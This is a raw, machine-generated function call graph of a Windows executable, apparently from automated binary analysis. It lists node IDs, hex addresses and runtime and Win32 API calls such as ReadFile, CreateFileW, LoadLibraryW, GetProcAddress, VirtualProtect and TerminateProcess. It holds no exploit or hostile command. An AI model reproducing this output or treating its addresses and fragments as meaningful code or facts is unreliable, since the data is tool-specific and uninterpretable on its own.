83969->83970 83971 414885 83969->83971 83975 41453a 83970->83975 83971->83970 83972 41453a __fileno 67 API calls 83971->83972 83973 4148a0 83972->83973 84010 41c3cf 101 API calls 6 library calls 83973->84010 83976 41455e 83975->83976 83977 414549 83975->83977 83981 41efd4 83976->83981 84011 417f23 67 API calls __getptd_noexit 83977->84011 83979 41454e 84012 417ebb 6 API calls 2 library calls 83979->84012 83982 41efe0 __setmode 83981->83982 83983 41f003 83982->83983 83984 41efe8 83982->83984 83986 41f011 83983->83986 83991 41f052 83983->83991 84033 417f36 67 API calls __getptd_noexit 83984->84033 84035 417f36 67 API calls __getptd_noexit 83986->84035 83987 41efed 84034 417f23 67 API calls __getptd_noexit 83987->84034 83990 41f016 84036 417f23 67 API calls __getptd_noexit 83990->84036 84013 41ba3b 83991->84013 83994 41f058 83996 41f065 83994->83996 83997 41f07b 83994->83997 83995 41f01d 84037 417ebb 6 API calls 2 library calls 83995->84037 84023 41ef5f 83996->84023 84038 417f23 67 API calls __getptd_noexit 83997->84038 83998 41eff5 __setmode 83998->83941 84002 41f073 84040 41f0a6 LeaveCriticalSection __unlock_fhandle 84002->84040 84003 41f080 84039 417f36 67 API calls __getptd_noexit 84003->84039 84006->83941 84007->83957 84009->83968 84010->83970 84011->83979 84014 41ba47 __setmode 84013->84014 84015 41baa2 84014->84015 84016 418407 __lock 67 API calls 84014->84016 84017 41baa7 EnterCriticalSection 84015->84017 84019 41bac4 __setmode 84015->84019 84018 41ba73 84016->84018 84017->84019 84020 41ba8a 84018->84020 84021 4189e6 __getstream InitializeCriticalSectionAndSpinCount 84018->84021 84019->83994 84022 41bad2 ___lock_fhandle LeaveCriticalSection 84020->84022 84021->84020 84022->84015 84024 41b9c4 __commit 67 API calls 84023->84024 84025 41ef6e 84024->84025 84026 41ef84 SetFilePointer 84025->84026 84027 41ef74 84025->84027 84029 41ef9b GetLastError 84026->84029 84030 41efa3 84026->84030 84028 417f23 __wctomb_s_l 67 API calls 84027->84028 84031 41ef79 84028->84031 84029->84030 84030->84031 84032 417f49 __dosmaperr 67 API calls 84030->84032 84031->84002 84032->84031 84033->83987 84034->83998 84035->83990 84036->83995 84038->84003 84039->84002 84040->83998 84042 414e31 84041->84042 84043 414e4d 84041->84043 84087 417f23 67 API calls __getptd_noexit 84042->84087 84046 414e46 84043->84046 84047 41486c __flush 101 API calls 84043->84047 84045 414e36 84088 417ebb 6 API calls 2 library calls 84045->84088 84059 414f08 LeaveCriticalSection LeaveCriticalSection _fprintf 84046->84059 84049 414e59 84047->84049 84060 41e680 84049->84060 84052 41453a __fileno 67 API calls 84053 414e67 84052->84053 84064 41e5b3 84053->84064 84055 414e6d 84055->84046 84056 413a88 __freebuf 67 API calls 84055->84056 84056->84046 84057->83775 84059->83777 84061 41e690 84060->84061 84062 414e61 84060->84062 84061->84062 84063 413a88 __freebuf 67 API calls 84061->84063 84062->84052 84063->84062 84065 41e5bf __setmode 84064->84065 84066 41e5e2 84065->84066 84067 41e5c7 84065->84067 84068 41e5f0 84066->84068 84073 41e631 84066->84073 84104 417f36 67 API calls __getptd_noexit 84067->84104 84106 417f36 67 API calls __getptd_noexit 84068->84106 84071 41e5cc 84105 417f23 67 API calls __getptd_noexit 84071->84105 84072 41e5f5 84107 417f23 67 API calls __getptd_noexit 84072->84107 84076 41ba3b ___lock_fhandle 68 API calls 84073->84076 84078 41e637 84076->84078 84077 41e5fc 84108 417ebb 6 API calls 2 library calls 84077->84108 84081 41e652 84078->84081 84082 41e644 84078->84082 84079 41e5d4 __setmode 84079->84055 84109 417f23 67 API calls __getptd_noexit 84081->84109 84089 41e517 84082->84089 84085 41e64c 84110 41e676 LeaveCriticalSection __unlock_fhandle 84085->84110 84087->84045 84111 41b9c4 84089->84111 84091 41e57d 84124 41b93e 68 API calls 2 library calls 84091->84124 84093 41e527 84093->84091 84094 41b9c4 __commit 67 API calls 84093->84094 84102 41e55b 84093->84102 84097 41e552 84094->84097 84095 41b9c4 __commit 67 API calls 84098 41e567 CloseHandle 84095->84098 84096 41e585 84103 41e5a7 84096->84103 84125 417f49 67 API calls 3 library calls 84096->84125 84099 41b9c4 __commit 67 API calls 84097->84099 84098->84091 84100 41e573 GetLastError 84098->84100 84099->84102 84100->84091 84102->84091 84102->84095 84103->84085 84104->84071 84105->84079 84106->84072 84107->84077 84109->84085 84110->84079 84112 41b9d1 84111->84112 84113 41b9e9 84111->84113 84114 417f36 __close 67 API calls 84112->84114 84115 417f36 __close 67 API calls 84113->84115 84123 41ba2e 84113->84123 84116 41b9d6 84114->84116 84117 41ba17 84115->84117 84118 417f23 __wctomb_s_l 67 API calls 84116->84118 84119 417f23 __wctomb_s_l 67 API calls 84117->84119 84120 41b9de 84118->84120 84121 41ba1e 84119->84121 84120->84093 84122 417ebb __wctomb_s_l 6 API calls 84121->84122 84122->84123 84123->84093 84124->84096 84125->84103 84127 415126 __setmode 84126->84127 84128 41513a _memset 84127->84128 84129 41516f 84127->84129 84130 415164 __setmode 84127->84130 84155 417f23 67 API calls __getptd_noexit 84128->84155 84131 415965 __lock_file 68 API calls 84129->84131 84130->83784 84133 415177 84131->84133 84139 414f10 84133->84139 84134 415154 84156 417ebb 6 API calls 2 library calls 84134->84156 84143 414f2e _memset 84139->84143 84145 414f4c 84139->84145 84140 414f37 84208 417f23 67 API calls __getptd_noexit 84140->84208 84142 414f3c 84209 417ebb 6 API calls 2 library calls 84142->84209 84143->84140 84143->84145 84152 414f8b 84143->84152 84157 4151a6 LeaveCriticalSection LeaveCriticalSection _fprintf 84145->84157 84147 4150a9 _memset 84211 417f23 67 API calls __getptd_noexit 84147->84211 84148 4150d5 _memset 84212 417f23 67 API calls __getptd_noexit 84148->84212 84150 41453a __fileno 67 API calls 84150->84152 84152->84145 84152->84147 84152->84148 84152->84150 84158 41ed9e 84152->84158 84188 41e6b1 84152->84188 84210 41ee9b 67 API calls 3 library calls 84152->84210 84155->84134 84157->84130 84159 41edaa __setmode 84158->84159 84160 41edb2 84159->84160 84161 41edcd 84159->84161 84282 417f36 67 API calls __getptd_noexit 84160->84282 84163 41eddb 84161->84163 84166 41ee1c 84161->84166 84284 417f36 67 API calls __getptd_noexit 84163->84284 84164 41edb7 84283 417f23 67 API calls __getptd_noexit 84164->84283 84169 41ee29 84166->84169 84170 41ee3d 84166->84170 84168 41ede0 84285 417f23 67 API calls __getptd_noexit 84168->84285 84287 417f36 67 API calls __getptd_noexit 84169->84287 84174 41ba3b ___lock_fhandle 68 API calls 84170->84174 84171 41edbf __setmode 84171->84152 84177 41ee43 84174->84177 84175 41ede7 84286 417ebb 6 API calls 2 library calls 84175->84286 84176 41ee2e 84288 417f23 67 API calls __getptd_noexit 84176->84288 84180 41ee50 84177->84180 84181 41ee66 84177->84181 84213 41e7dc 84180->84213 84289 417f23 67 API calls __getptd_noexit 84181->84289 84184 41ee6b 84290 417f36 67 API calls __getptd_noexit 84184->84290 84185 41ee5e 84291 41ee91 LeaveCriticalSection __unlock_fhandle 84185->84291 84189 41e6c1 84188->84189 84192 41e6de 84188->84192 84295 417f23 67 API calls __getptd_noexit 84189->84295 84191 41e6c6 84296 417ebb 6 API calls 2 library calls 84191->84296 84194 41e713 84192->84194 84200 41e6d6 84192->84200 84292 423600 84192->84292 84196 41453a __fileno 67 API calls 84194->84196 84197 41e727 84196->84197 84198 41ed9e __read 79 API calls 84197->84198 84199 41e72e 84198->84199 84199->84200 84201 41453a __fileno 67 API calls 84199->84201 84200->84152 84202 41e751 84201->84202 84202->84200 84203 41453a __fileno 67 API calls 84202->84203 84204 41e75d 84203->84204 84204->84200 84205 41453a __fileno 67 API calls 84204->84205 84206 41e769 84205->84206 84207 41453a __fileno 67 API calls 84206->84207 84207->84200 84208->84142 84210->84152 84211->84142 84212->84142 84214 41e813 84213->84214 84215 41e7f8 84213->84215 84217 41e822 84214->84217 84219 41e849 84214->84219 84216 417f36 __close 67 API calls 84215->84216 84218 41e7fd 84216->84218 84220 417f36 __close 67 API calls 84217->84220 84222 417f23 __wctomb_s_l 67 API calls 84218->84222 84221 41e868 84219->84221 84235 41e87c 84219->84235 84223 41e827 84220->84223 84224 417f36 __close 67 API calls 84221->84224 84236 41e805 84222->84236 84226 417f23 __wctomb_s_l 67 API calls 84223->84226 84228 41e86d 84224->84228 84225 41e8d4 84227 417f36 __close 67 API calls 84225->84227 84229 41e82e 84226->84229 84230 41e8d9 84227->84230 84231 417f23 __wctomb_s_l 67 API calls 84228->84231 84232 417ebb __wctomb_s_l 6 API calls 84229->84232 84233 417f23 __wctomb_s_l 67 API calls 84230->84233 84234 41e874 84231->84234 84232->84236 84233->84234 84238 417ebb __wctomb_s_l 6 API calls 84234->84238 84235->84225 84235->84236 84237 41e8b0 84235->84237 84239 41e8f5 84235->84239 84236->84185 84237->84225 84244 41e8bb ReadFile 84237->84244 84238->84236 84241 416fb6 __malloc_crt 67 API calls 84239->84241 84245 41e90b 84241->84245 84242 41ed62 GetLastError 84246 41ebe8 84242->84246 84247 41ed6f 84242->84247 84243 41e9e7 84243->84242 84250 41e9fb 84243->84250 84244->84242 84244->84243 84248 41e931 84245->84248 84249 41e913 84245->84249 84256 417f49 __dosmaperr 67 API calls 84246->84256 84261 41eb6d 84246->84261 84252 417f23 __wctomb_s_l 67 API calls 84247->84252 84251 423462 __lseeki64_nolock 69 API calls 84248->84251 84253 417f23 __wctomb_s_l 67 API calls 84249->84253 84250->84261 84263 41ec2d 84250->84263 84264 41ea17 84250->84264 84254 41e93d 84251->84254 84255 41ed74 84252->84255 84257 41e918 84253->84257 84254->84244 84258 417f36 __close 67 API calls 84255->84258 84256->84261 84259 417f36 __close 67 API calls 84257->84259 84258->84261 84259->84236 84260 413a88 __freebuf 67 API calls 84260->84236 84261->84236 84261->84260 84262 41eca5 ReadFile 84267 41ecc4 GetLastError 84262->84267 84274 41ecce 84262->84274 84263->84261 84263->84262 84265 41ea7d ReadFile 84264->84265 84270 41eafa 84264->84270 84266 41ea9b GetLastError 84265->84266 84273 41eaa5 84265->84273 84266->84264 84266->84273 84267->84263 84267->84274 84268 41ebbe MultiByteToWideChar 84268->84261 84269 41ebe2 GetLastError 84268->84269 84269->84246 84270->84261 84271 41eb75 84270->84271 84272 41eb68 84270->84272 84276 41eb32 84270->84276 84271->84276 84277 41ebac 84271->84277 84275 417f23 __wctomb_s_l 67 API calls 84272->84275 84273->84264 84278 423462 __lseeki64_nolock 69 API calls 84273->84278 84274->84263 84279 423462 __lseeki64_nolock 69 API calls 84274->84279 84275->84261 84276->84268 84280 423462 __lseeki64_nolock 69 API calls 84277->84280 84278->84273 84279->84274 84281 41ebbb 84280->84281 84281->84268 84282->84164 84283->84171 84284->84168 84285->84175 84287->84176 84288->84175 84289->84184 84290->84185 84291->84171 84293 416fb6 __malloc_crt 67 API calls 84292->84293 84294 423615 84293->84294 84294->84194 84295->84191 84300 414cef GetSystemTimeAsFileTime __aulldiv 84297->84300 84299 4431ef 84299->83787 84300->84299 84301->83794 84303->83799 84307 4523e1 _wcscpy 84304->84307 84305 44afdc GetSystemTimeAsFileTime 84305->84307 84306 452553 84306->83709 84306->83710 84307->84305 84307->84306 84308 4151b0 81 API calls __fread_nolock 84307->84308 84309 41557c 105 API calls _fseek 84307->84309 84308->84307 84309->84307 84311 44b1b4 84310->84311 84312 44b1a6 84310->84312 84314 44b1ca 84311->84314 84315 414e06 138 API calls 84311->84315 84316 44b1c2 84311->84316 84313 414e06 138 API calls 84312->84313 84313->84311 84345 4352d1 81 API calls 2 library calls 84314->84345 84317 44b2c1 84315->84317 84316->83738 84317->84314 84319 44b2cf 84317->84319 84323 44b2dc 84319->84323 84325 414e94 __fcloseall 106 API calls 84319->84325 84320 44b20d 84321 44b211 84320->84321 84322 44b23b 84320->84322 84324 44b21e 84321->84324 84327 414e94 __fcloseall 106 API calls 84321->84327 84346 43526e 84322->84346 84323->83738 84329 414e94 __fcloseall 106 API calls 84324->84329 84332 44b22e 84324->84332 84325->84323 84327->84324 84328 44b242 84330 44b270 84328->84330 84333 44b248 84328->84333 84329->84332 84356 44b0af 111 API calls 84330->84356 84332->83738 84334 44b255 84333->84334 84337 414e94 __fcloseall 106 API calls 84333->84337 84335 44b265 84334->84335 84338 414e94 __fcloseall 106 API calls 84334->84338 84335->83738 84336 44b276 84357 43522c 67 API calls __freebuf 84336->84357 84337->84334 84338->84335 84340 44b27c 84341 44b289 84340->84341 84342 414e94 __fcloseall 106 API calls 84340->84342 84343 44b299 84341->84343 84344 414e94 __fcloseall 106 API calls 84341->84344 84342->84341 84343->83738 84344->84343 84345->84320 84347 4138ba _malloc 67 API calls 84346->84347 84348 43527d 84347->84348 84349 4138ba _malloc 67 API calls 84348->84349 84350 43528d 84349->84350 84351 4138ba _malloc 67 API calls 84350->84351 84352 43529d 84351->84352 84354 4352bc 84352->84354 84358 43522c 67 API calls __freebuf 84352->84358 84354->84328 84355 4352c8 84355->84328 84356->84336 84357->84340 84358->84355 84359->83618 84361 410148 SHGetDesktopFolder 84360->84361 84364 4101a3 _wcscpy 84360->84364 84362 41015a _wcscpy 84361->84362 84361->84364 84363 41018a SHGetPathFromIDListW 84362->84363 84362->84364 84363->84364 84364->83621 84365->83623 84367 40f5e0 152 API calls 84366->84367 84368 40f417 84367->84368 84369 42ca37 84368->84369 84371 40f42c 84368->84371 84372 42ca1f 84368->84372 84370 452574 140 API calls 84369->84370 84374 42ca50 84370->84374 84414 4037e0 139 API calls 7 library calls 84371->84414 84415 43717f 110 API calls _printf 84372->84415 84378 42ca76 84374->84378 84379 42ca54 84374->84379 84376 40f446 84376->83619 84377 42ca2d 84377->84369 84381 41171a 75 API calls 84378->84381 84380 434fe1 106 API calls 84379->84380 84382 42ca5e 84380->84382 84396 42cacc ctype 84381->84396 84416 43717f 110 API calls _printf 84382->84416 84384 42ccc3 84386 413a88 __freebuf 67 API calls 84384->84386 84385 42ca6c 84385->84378 84387 42cccd 84386->84387 84388 434fe1 106 API calls 84387->84388 84389 42ccda 84388->84389 84393 401b70 75 API calls 84393->84396 84396->84384 84396->84393 84397 445051 84396->84397 84400 402cc0 84396->84400 84408 4026a0 84396->84408 84417 44c80c 87 API calls 3 library calls 84396->84417 84418 44b408 75 API calls 84396->84418 84398 41171a 75 API calls 84397->84398 84399 445080 _realloc 84398->84399 84399->84396 84399->84399 84401 402d71 84400->84401 84404 402cd2 _realloc ctype 84400->84404 84403 41171a 75 API calls 84401->84403 84402 41171a 75 API calls 84405 402cd9 84402->84405 84403->84404 84404->84402 84406 402cff 84405->84406 84407 41171a 75 API calls 84405->84407 84406->84396 84407->84406 84409 4026af 84408->84409 84411 40276b 84408->84411 84410 41171a 75 API calls 84409->84410 84409->84411 84412 4026ee ctype 84409->84412 84410->84412 84411->84396 84412->84411 84413 41171a 75 API calls 84412->84413 84413->84412 84414->84376 84415->84377 84416->84385 84417->84396 84418->84396 84419->83631 84420->83630 84421 444343 84424 444326 84421->84424 84423 44434e WriteFile 84425 444340 84424->84425 84426 4442c7 84424->84426 84425->84423 84431 40e190 SetFilePointerEx 84426->84431 84428 4442e0 SetFilePointerEx 84432 40e190 SetFilePointerEx 84428->84432 84430 4442ff 84430->84423 84431->84428 84432->84430 84644 431914 84645 431920 84644->84645 84646 431928 84645->84646 84647 43193d 84645->84647 84908 45e62e 116 API calls 3 library calls 84646->84908 84909 47f2b4 174 API calls 84647->84909 84650 43194a 84687 4095b0 ctype 84650->84687 84910 45e62e 116 API calls 3 library calls 84650->84910 84651 409708 84654 4097af 84654->84651 84895 40d590 VariantClear 84654->84895 84656 4315b8 WaitForSingleObject 84658 4315d6 GetExitCodeProcess CloseHandle 84656->84658 84656->84687 84899 40d590 VariantClear 84658->84899 84659 431623 Sleep 84662 43163b timeGetTime 84659->84662 84681 409894 84659->84681 84662->84681 84665 40986e Sleep 84667 409880 timeGetTime 84665->84667 84665->84681 84666 4098f1 TranslateMessage DispatchMessageW 84666->84687 84667->84681 84668 431673 CloseHandle 84668->84681 84669 43170c GetExitCodeProcess CloseHandle 84669->84681 84670 40d590 VariantClear 84670->84681 84672 46dd22 133 API calls 84672->84681 84674 46e641 134 API calls 84674->84681 84676 431781 Sleep 84676->84687 84681->84668 84681->84669 84681->84670 84681->84672 84681->84674 84681->84676 84686 4092c0 VariantClear 84681->84686 84681->84687 84896 447e59 75 API calls 84681->84896 84897 453b07 77 API calls 84681->84897 84898 4646a2 76 API calls 84681->84898 84900 444233 88 API calls _wcslen 84681->84900 84901 457509 VariantClear 84681->84901 84902 404120 84681->84902 84906 4717e3 VariantClear 84681->84906 84907 436272 6 API calls 84681->84907 84684 45e62e 116 API calls 84684->84687 84685 4319c9 VariantClear 84685->84687 84686->84681 84687->84651 84687->84654 84687->84656 84687->84659 84687->84665 84687->84666 84687->84681 84687->84684 84687->84685 84688 4092c0 VariantClear 84687->84688 84690 40b380 84687->84690 84714 409340 84687->84714 84747 409030 84687->84747 84761 40d300 84687->84761 84766 40d320 84687->84766 84772 409a40 84687->84772 84911 40e380 VariantClear ctype 84687->84911 84688->84687 84691 40b3a5 84690->84691 84692 40b53d 84690->84692 84693 430a99 84691->84693 84698 40b3b6 84691->84698 84912 45e62e 116 API calls 3 library calls 84692->84912 84913 45e62e 116 API calls 3 library calls 84693->84913 84696 430aae 84701 4092c0 VariantClear 84696->84701 84697 40b528 84697->84687 84698->84696 84702 40b3f2 84698->84702 84709 40b4fd ctype 84698->84709 84700 430dc9 84700->84700 84701->84697 84703 430ae9 VariantClear 84702->84703 84706 40b429 84702->84706 84711 40b476 ctype 84702->84711 84713 40b43b ctype 84703->84713 84704 430d41 VariantClear 84704->84709 84705 40b4eb 84705->84709 84915 40e380 VariantClear ctype 84705->84915 84706->84713 84914 40e380 VariantClear ctype 84706->84914 84709->84697 84916 45e62e 116 API calls 3 library calls 84709->84916 84710 41171a 75 API calls 84710->84711 84711->84705 84712 430d08 ctype 84711->84712 84712->84704 84712->84709 84713->84710 84713->84711 84715 409386 84714->84715 84719 409395 84714->84719 84917 4042f0 75 API calls __cinit 84715->84917 84718 42fba9 84921 45e62e 116 API calls 3 library calls 84718->84921 84719->84718 84721 42fc07 84719->84721 84722 42fc85 84719->84722 84726 42fd4f 84719->84726 84727 42fcd8 84719->84727 84733 42fd39 84719->84733 84734 40946f 84719->84734 84736 4094c1 84719->84736 84739 40947b 84719->84739 84743 4092c0 VariantClear 84719->84743 84746 409484 ctype 84719->84746 84920 453155 75 API calls 84719->84920 84922 40c620 118 API calls 84719->84922 84924 45e62e 116 API calls 3 library calls 84719->84924 84923 45e62e 116 API calls 3 library calls 84721->84923 84925 4781ae 140 API calls 84722->84925 84729 4092c0 VariantClear 84726->84729 84927 47f2b4 174 API calls 84727->84927 84728 42fc9c 84728->84746 84926 45e62e 116 API calls 3 library calls 84728->84926 84729->84746 84929 45e62e 116 API calls 3 library calls 84733->84929 84918 409210 VariantClear 84734->84918 84735 42fce9 84735->84746 84928 45e62e 116 API calls 3 library calls 84735->84928 84736->84746 84919 404260 76 API calls 84736->84919 84741 4092c0 VariantClear 84739->84741 84741->84746 84743->84719 84744 4094e1 84745 4092c0 VariantClear 84744->84745 84745->84746 84746->84687 84930 409110 117 API calls 84747->84930 84749 42ceb6 84940 410ae0 VariantClear ctype 84749->84940 84751 40906e 84751->84749 84753 42cea9 84751->84753 84755 4090a4 84751->84755 84752 42cebf 84939 45e62e 116 API calls 3 library calls 84753->84939 84931 404160 84755->84931 84758 4090f0 ctype 84758->84687 84759 4092c0 VariantClear 84760 4090be ctype 84759->84760 84760->84758 84760->84759 84763 4292e3 84761->84763 84765 40d30c 84761->84765 84762 429323 84762->84687 84763->84762 84764 4292fd TranslateAcceleratorW 84763->84764 84764->84765 84765->84687 84767 4296d0 84766->84767 84770 40d32f 84766->84770 84767->84687 84768 42972a IsDialogMessageW 84769 40d33c 84768->84769 84768->84770 84769->84687 84770->84768 84770->84769 85075 4340ec GetClassLongW 84770->85075 84773 409a66 _wcslen 84772->84773 84774 41171a 75 API calls 84773->84774 84834 40aade _realloc ctype 84773->84834 84775 409a9c _realloc 84774->84775 84777 41171a 75 API calls 84775->84777 84779 409abd 84777->84779 84778 42cee9 84780 41171a 75 API calls 84778->84780 84781 409aeb CharUpperBuffW 84779->84781 84783 409b09 ctype 84779->84783 84779->84834 84822 42cf10 _realloc 84780->84822 84781->84783 84823 409b88 ctype 84783->84823 85078 47d10e 150 API calls 84783->85078 84785 4092c0 VariantClear 84786 42e5e0 84785->84786 85110 410ae0 VariantClear ctype 84786->85110 84788 42e5f2 84789 409e4a 84791 41171a 75 API calls 84789->84791 84795 409ea4 84789->84795 84789->84822 84790 40aa5b 84792 41171a 75 API calls 84790->84792 84791->84795 84809 40aa81 _realloc ctype 84792->84809 84794 409ed0 84798 42d50d 84794->84798 84857 409ef8 _realloc ctype 84794->84857 85088 40b800 VariantClear VariantClear ctype 84794->85088 84795->84794 84796 41171a 75 API calls 84795->84796 84797 42d480 84796->84797 84800 42d491 84797->84800 85084 44b3f6 75 API calls 84797->85084 84802 42d527 84798->84802 85089 40b800 VariantClear VariantClear ctype 84798->85089 84799 40a3a7 84807 40a415 84799->84807 84854 42db5c 84799->84854 85085 40df50 75 API calls 84800->85085 84802->84857 85090 40e2e0 VariantClear ctype 84802->85090 84803 42d195 VariantClear 84803->84823 84804 4092c0 VariantClear 84804->84823 84811 41171a 75 API calls 84807->84811 84818 41171a 75 API calls 84809->84818 84829 40a41c 84811->84829 84814 41171a 75 API calls 84814->84823 84816 42db96 85096 45e62e 116 API calls 3 library calls 84816->85096 84818->84834 84819 42d4a6 85086 4530b3 75 API calls 84819->85086 84821 42d128 84826 4092c0 VariantClear 84821->84826 85109 45e62e 116 API calls 3 library calls 84822->85109 84823->84789 84823->84790 84823->84803 84823->84804 84823->84809 84823->84814 84823->84821 84823->84822 84824 42d20c 84823->84824 84832 42dbb9 84823->84832 85079 40c3e0 75 API calls 84823->85079 85080 40c620 118 API calls 84823->85080 85082 40be00 75 API calls 2 library calls 84823->85082 85083 40e380 VariantClear ctype 84823->85083 84824->84687 84825 42d4d7 85087 4530b3 75 API calls 84825->85087 84831 42d131 84826->84831 84841 40a481 84829->84841 85097 40c8a0 VariantClear ctype 84829->85097 85081 410ae0 VariantClear ctype 84831->85081 84832->84785 85077 401380 75 API calls 84834->85077 84837 402cc0 75 API calls 84837->84857 84838 4092c0 VariantClear 84870 40a534 _realloc ctype 84838->84870 84839 41171a 75 API calls 84839->84857 84840 411421 74 API calls __cinit 84840->84857 84842 40a4ed 84841->84842 84843 42dc1e VariantClear 84841->84843 84841->84870 84847 40a4ff ctype 84842->84847 85098 40e380 VariantClear ctype 84842->85098 84843->84847 84846 41171a 75 API calls 84846->84870 84847->84846 84847->84870 84851 44b3f6 75 API calls 84851->84857 84852 42deb6 VariantClear 84852->84870 84853 40a73c 84855 42e237 84853->84855 84863 40a76b 84853->84863 85095 4721e5 VariantClear 84854->85095 85102 46e709 VariantClear VariantClear ctype 84855->85102 84856 42dfe9 VariantClear 84856->84870 84857->84799 84857->84816 84857->84834 84857->84837 84857->84839 84857->84840 84857->84851 84857->84854 84861 40a053 84857->84861 85091 45ee98 75 API calls 84857->85091 85092 4019e0 76 API calls 84857->85092 85093 404260 76 API calls 84857->85093 85094 409210 VariantClear 84857->85094 84858 42df47 VariantClear 84858->84870 84859 40a7a2 84876 40a7ad ctype 84859->84876 85103 40b800 VariantClear VariantClear ctype 84859->85103 84861->84687 84862 40e380 VariantClear 84862->84870 84863->84859 84885 40a800 ctype 84863->84885 85076 40b800 VariantClear VariantClear ctype 84863->85076 84866 41171a 75 API calls 84866->84870 84867 40a8b0 84881 40a8c2 ctype 84867->84881 85105 40e380 VariantClear ctype 84867->85105 84868 42e312 84871 42e337 VariantClear 84868->84871 84868->84881 84869 41171a 75 API calls 84872 42dd10 VariantInit VariantCopy 84869->84872 84870->84838 84870->84852 84870->84853 84870->84855 84870->84856 84870->84858 84870->84862 84870->84866 84870->84869 85099 46e9cd 75 API calls 84870->85099 85100 409210 VariantClear 84870->85100 85101 44cc6c VariantClear ctype 84870->85101 84871->84881 84872->84870 84875 42dd30 VariantClear 84872->84875 84874 42e3b2 84882 42e3da VariantClear 84874->84882 84889 40a91a ctype 84874->84889 84875->84870 84877 40a7ee 84876->84877 84878 42e2a7 VariantClear 84876->84878 84876->84885 84877->84885 85104 40e380 VariantClear ctype 84877->85104 84878->84885 84879 40a908 84879->84889 85106 40e380 VariantClear ctype 84879->85106 84881->84874 84881->84879 84882->84889 84884 42e47f 84888 42e4a3 VariantClear 84884->84888 84894 40a957 ctype 84884->84894 84885->84867 84885->84868 84886 40a945 84886->84894 85107 40e380 VariantClear ctype 84886->85107 84888->84894 84889->84884 84889->84886 84891 40aa22 ctype 84891->84687 84892 42e559 VariantClear 84892->84894 84894->84891 84894->84892 85108 40e380 VariantClear ctype 84894->85108 84895->84651 84896->84681 84897->84681 84898->84681 84899->84681 84900->84681 84901->84681 84903 40412e 84902->84903 84904 4092c0 VariantClear 84903->84904 84905 404138 84904->84905 84905->84676 84906->84681 84907->84681 84908->84687 84909->84650 84910->84687 84911->84687 84912->84693 84913->84696 84914->84713 84915->84709 84916->84700 84917->84719 84918->84739 84919->84744 84920->84719 84921->84746 84922->84719 84923->84746 84924->84719 84925->84728 84926->84746 84927->84735 84928->84746 84929->84726 84930->84751 84932 4092c0 VariantClear 84931->84932 84933 40416e 84932->84933 84934 404120 VariantClear 84933->84934 84935 40419b 84934->84935 84941 40efe0 84935->84941 84949 4734b7 84935->84949 84936 4041c6 84936->84749 84936->84760 84939->84749 84940->84752 84942 40eff5 CreateFileW 84941->84942 84943 4299bf 84941->84943 84944 40f017 84942->84944 84943->84944 84945 4299c4 CreateFileW 84943->84945 84944->84936 84945->84944 84946 4299ea 84945->84946 84993 40e0d0 SetFilePointerEx SetFilePointerEx 84946->84993 84948 4299f5 84948->84944 84950 453063 111 API calls 84949->84950 84951 4734d7 84950->84951 84952 473545 84951->84952 84953 47350c 84951->84953 84994 463c42 84952->84994 84954 4092c0 VariantClear 84953->84954 84961 473514 84954->84961 84956 473558 84957 47355c 84956->84957 84974 473595 84956->84974 84959 4092c0 VariantClear 84957->84959 84958 473616 85007 463d7e 84958->85007 84968 473564 84959->84968 84961->84936 84962 473622 84964 473697 84962->84964 84965 47362c 84962->84965 84963 453063 111 API calls 84963->84974 85041 457838 84964->85041 84967 4092c0 VariantClear 84965->84967 84971 473634 84967->84971 84968->84936 84971->84936 84973 473655 84976 4092c0 VariantClear 84973->84976 84974->84958 84974->84963 84974->84973 85053 462f5a 87 API calls __wcsicoll 84974->85053 84988 47365d 84976->84988 84977 4736b0 85054 45e62e 116 API calls 3 library calls 84977->85054 84978 4736c9 85055 40e7e0 76 API calls 84978->85055 84981 4736ba GetCurrentProcess TerminateProcess 84981->84978 84982 4736db 84989 4736ff 84982->84989 85056 40d030 76 API calls 84982->85056 84983 473731 84990 473744 FreeLibrary 84983->84990 84991 47374b 84983->84991 84985 4736f1 85057 46b945 134 API calls 2 library calls 84985->85057 84988->84936 84989->84983 85058 40d030 76 API calls 84989->85058 85059 46b945 134 API calls 2 library calls 84989->85059 84990->84991 84991->84936 84993->84948 85060 45335b 76 API calls 84994->85060 84996 463c5d 85061 442c52 80 API calls _wcslen 84996->85061 84998 463c72 85000 40c060 75 API calls 84998->85000 85006 463cac 84998->85006 85001 463c8e 85000->85001 85062 4608ce 75 API calls _realloc 85001->85062 85003 463ca4 85005 40c740 75 API calls 85003->85005 85004 463cf7 85004->84956 85005->85006 85006->85004 85063 462f5a 87 API calls __wcsicoll 85006->85063 85008 453063 111 API calls 85007->85008 85009 463d99 85008->85009 85010 463de0 85009->85010 85011 463dca 85009->85011 85065 40c760 78 API calls 85010->85065 85064 453081 111 API calls 85011->85064 85014 463dd0 LoadLibraryW 85025 463e09 85014->85025 85015 463de7 85023 463e19 85015->85023 85066 40c760 78 API calls 85015->85066 85017 463e3e 85019 463e4e 85017->85019 85020 463e7b 85017->85020 85018 463dfb 85018->85023 85067 40c760 78 API calls 85018->85067 85068 40d500 75 API calls 85019->85068 85070 40c760 78 API calls 85020->85070 85023->84962 85025->85017 85025->85023 85026 463e82 GetProcAddress 85030 463e90 85026->85030 85027 463e57 85069 45efe7 77 API calls ctype 85027->85069 85029 463e62 GetProcAddress 85032 463e79 85029->85032 85030->85023 85031 463edf 85030->85031 85030->85032 85031->85023 85034 463eef FreeLibrary 85031->85034 85032->85030 85071 403470 75 API calls _realloc 85032->85071 85034->85023 85035 463eb4 85072 40d500 75 API calls 85035->85072 85037 463ebd 85073 45efe7 77 API calls ctype 85037->85073 85039 463ec8 GetProcAddress 85074 401330 ctype 85039->85074 85042 457a4c 85041->85042 85047 45785f _strcat _wcslen _wcscpy ctype 85041->85047 85049 410d40 85042->85049 85043 443576 78 API calls 85043->85047 85044 40c760 78 API calls 85044->85047 85045 453081 111 API calls 85045->85047 85046 4138ba 67 API calls _malloc 85046->85047 85047->85042 85047->85043 85047->85044 85047->85045 85047->85046 85048 40f580 77 API calls 85047->85048 85048->85047 85050 410d55 85049->85050 85051 410ded VirtualProtect 85050->85051 85052 410dbb 85050->85052 85051->85052 85052->84977 85052->84978 85053->84974 85054->84981 85055->84982 85056->84985 85057->84989 85058->84989 85059->84989 85060->84996 85061->84998 85062->85003 85063->85004 85064->85014 85065->85015 85066->85018 85067->85025 85068->85027 85069->85029 85070->85026 85071->85035 85072->85037 85073->85039 85074->85031 85075->84770 85076->84859 85077->84778 85078->84783 85079->84823 85080->84823 85081->84891 85082->84823 85083->84823 85084->84800 85085->84819 85086->84825 85087->84794 85088->84798 85089->84802 85090->84857 85091->84857 85092->84857 85093->84857 85094->84857 